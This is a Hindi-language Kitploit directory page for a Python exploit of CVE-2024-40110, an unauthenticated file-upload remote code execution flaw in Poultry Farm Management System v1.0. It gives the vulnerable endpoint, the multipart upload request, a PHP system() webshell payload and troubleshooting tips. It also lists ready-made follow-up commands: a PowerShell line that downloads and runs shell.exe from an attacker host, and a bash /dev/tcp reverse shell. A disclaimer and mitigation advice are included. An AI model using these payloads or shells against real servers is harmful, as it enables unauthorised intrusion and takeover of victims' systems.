Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-40110 — पोल्ट्री फार्म मैनेजमेंट सिस्टम v1.0 में फ़ाइल अपलोड के माध्यम से अनधिकृत रिमोट कोड निष्पादन के लिए पायथन एक्सप्लॉइट। कमज़ोर लक्ष्यों पर मनमाना सिस्टम कमांड निष्पादित करने के लिए PHP शैल अपलोड करता है। | Kitploit
उपकरण/GitHubGitHub/angry-althaf/cve-2024-40110
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubangry-althaf/cve-2024-40110

CVE-2024-40110

पोल्ट्री फार्म मैनेजमेंट सिस्टम v1.0 में फ़ाइल अपलोड के माध्यम से अनधिकृत रिमोट कोड निष्पादन के लिए पायथन एक्सप्लॉइट। कमज़ोर लक्ष्यों पर मनमाना सिस्टम कमांड निष्पादित करने के लिए PHP शैल अपलोड करता है।

रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

पोल्ट्री फार्म प्रबंधन प्रणाली v1.0 - RCE शोषण

भेद्यता प्रकार

अनप्रमाणित फ़ाइल अपलोड जिसमें दूरस्थ कोड निष्पादन शामिल है

विवरण

पोल्ट्री फार्म प्रबंधन प्रणाली v1.0 में उत्पाद अपलोड कार्यक्षमता में एक गंभीर कमजोरी है। एप्लिकेशन फ़ाइल अपलोड को ठीक से मान्य और स्वच्छ करने में विफल रहता है, जिससे हमलावर PHP फ़ाइलों को उत्पाद छवियों के रूप में प्रच्छन्न करके अपलोड कर सकते हैं। ये अपलोड की गई PHP फ़ाइलें निष्पादित हो सकती हैं, जिससे दूरस्थ कोड निष्पादन प्राप्त किया जा सकता है।

कमजोर समापन बिंदु

root@kitploit:~
POST /paultry/farm/product.php or POST /farm/product.php

हमला वेक्टर

इस कमजोरी का शोषण निम्नलिखित तरीके से किया जा सकता है:

  1. उत्पाद अपलोड समापन बिंदु पर POST अनुरोध भेजना
  2. स्वेच्छाधीन कमांड के साथ PHP शेल फ़ाइल अपलोड करना
  3. एम्बेडेड कमांड को निष्पादित करने के लिए अपलोड की गई फ़ाइल तक पहुँचना

आवश्यकताएँ

पूर्वापेक्षाएँ

  • Python 3.7+
  • requests लाइब्रेरी
  • colorama लाइब्रेरी (रंगीन आउटपुट के लिए)
  • कमजोर लक्ष्य तक नेटवर्क पहुँच

स्थापना

root@kitploit:~
pip install requests colorama

या सभी निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install -r requirements.txt

उपयोग

मूल उपयोग

स्क्रिप्ट को इंटरैक्टिव रूप से चलाएँ:

root@kitploit:~
python exploit.py

स्क्रिप्ट आपसे निम्नलिखित के लिए संकेत देगी:

  1. लक्ष्य IP पता - कमजोर सर्वर का IP पता
  2. लक्ष्य पोर्ट - पोर्ट नंबर (डिफ़ॉल्ट: 80)
  3. निष्पादित करने का आदेश - लक्ष्य पर चलाने के लिए सिस्टम कमांड

उदाहरण

root@kitploit:~
==================================================
Interactive Backdoor Upload Tool
==================================================

Enter target IP address: 192.168.1.100
Enter target port (default: 80): 8080
Enter command to execute (default: powershell payload):
Command: whoami

==================================================
CONFIRMATION
==================================================
Target URL: http://192.168.1.100:8080
Command: whoami
Do you want to proceed? (yes/no): yes

विशेषताएँ

✅ इंटरैक्टिव इनपुट - IP, पोर्ट और कस्टम कमांड के लिए संकेत देता है
✅ डिफ़ॉल्ट मान - सुविधा के लिए उपयुक्त डिफ़ॉल्ट मान
✅ रंग-कोडित आउटपुट - पढ़ने में आसान रंगीन टर्मिनल आउटपुट
✅ पुष्टिकरण चरण - निष्पादन से पहले सेटिंग्स सत्यापित करें
✅ त्रुटि प्रबंधन - असफल अनुरोधों के लिए सुव्यवस्थित त्रुटि संदेश
✅ लचीले कमांड - किसी भी शेल कमांड या PowerShell पेलोड के लिए समर्थन

सामान्य कमांड

विंडोज लक्ष्य

root@kitploit:~
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"

लिनक्स लक्ष्य

root@kitploit:~
bash -i >& /dev/tcp/attacker-ip/4444 0>&1

सूचना संग्रह

root@kitploit:~
whoami
id
ifconfig
hostname
pwd

तकनीकी विवरण

यह कैसे काम करता है

  1. फ़ाइल अपलोड: PHP पेलोड को फ़ाइल के रूप में एम्बेड करके POST अनुरोध भेजता है
  2. पेलोड निष्पादन: अपलोड की गई PHP फ़ाइल /assets/img/productimages/ में संग्रहीत होती है
  3. कमांड निष्पादन: PHP फ़ाइल तक पहुँचने पर system() फ़ंक्शन के माध्यम से कमांड निष्पादन ट्रिगर होता है
  4. आउटपुट प्राप्ति: स्क्रिप्ट GET अनुरोध के माध्यम से आउटपुट लाती है

अनुरोध संरचना

root@kitploit:~
POST /paultry/farm/product.php
Content-Type: multipart/form-data

category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]

पेलोड प्रारूप

root@kitploit:~
<?php system('COMMAND_HERE');?>

परीक्षण वातावरण

शोषण का परीक्षण निम्नलिखित पर किया गया:

  • OS: Windows 10
  • Server: XAMPP v3.3.0
  • PHP संस्करण: PHP 5.6+ के साथ संगत

अस्वीकरण

⚠️ कानूनी चेतावनी

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम में अनधिकृत पहुँच अवैध है।

  • इस शोषण का उपयोग केवल उन सिस्टमों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • लेखक इस उपकरण के दुरुपयोग या क्षति के लिए कोई देयता स्वीकार नहीं करते हैं
  • उपयोगकर्ता यह सुनिश्चित करने के लिए जिम्मेदार हैं कि वे सभी लागू कानूनों और विनियमों का पालन करें
  • कंप्यूटर सिस्टम में अनधिकृत पहुँच, संशोधन या व्यवधान कंप्यूटर धोखाधड़ी और दुरुपयोग अधिनियम (CFAA) और दुनिया भर में समान कानूनों के तहत एक संघीय अपराध है

शमन

प्रशासकों के लिए

  1. सॉफ़्टवेयर अपडेट करें - यदि उपलब्ध हों तो सुरक्षा पैच लागू करें

  2. फ़ाइल अपलोड सत्यापन

    • फ़ाइल एक्सटेंशन मान्य करें (श्वेतसूची: jpg, png, gif, आदि)
    • सर्वर-साइड पर MIME प्रकार जाँचें
    • अपलोड की गई फ़ाइलों को वेब रूट के बाहर संग्रहीत करें
    • अपलोड निर्देशिकाओं में स्क्रिप्ट निष्पादन अक्षम करें
  3. कॉन्फ़िगरेशन

    root@kitploit:~
    <Directory /uploads>
        php_flag engine off
        AddType text/plain .php .phtml .php3 .php4 .php5 .phar
    </Directory>
    
  4. पहुँच नियंत्रण

    • अपलोड की अनुमति देने से पहले प्रमाणीकरण लागू करें
    • उपयोगकर्ता अनुमतियाँ मान्य करें
    • दर सीमा जोड़ें
  5. निगरानी

    • अपलोड निर्देशिकाओं में संदिग्ध फ़ाइलों की निगरानी करें
    • सभी अपलोड प्रयासों को लॉग करें
    • फ़ाइल अखंडता जाँच लागू करें

संदर्भ

  • एक्सप्लॉइट DB: https://www.exploit-db.com/exploits/52053
  • गिटहब: https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
  • मूल सॉफ़्टवेयर: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

समस्या निवारण

कनेक्शन अस्वीकार

root@kitploit:~
Error: Connection refused
Solution: Verify the target IP and port are correct and the application is running

404 नहीं मिला

root@kitploit:~
Error: Failed to upload shell. Status code: 404
Solution: The endpoint path may differ. Common paths: /farm/, /paultry/farm/

PHP निष्पादित नहीं हुआ

root@kitploit:~
Error: Command output is empty
Solution: PHP execution may be disabled or the file wasn't uploaded correctly

सहायता

समस्याओं, प्रश्नों या सुधारों के लिए, GitHub रिपॉजिटरी या Exploit-DB पेज देखें।


अंतिम अद्यतन: दिसंबर 2024
स्थिति: सत्यापित और परीक्षित

टूल डाउनलोड करें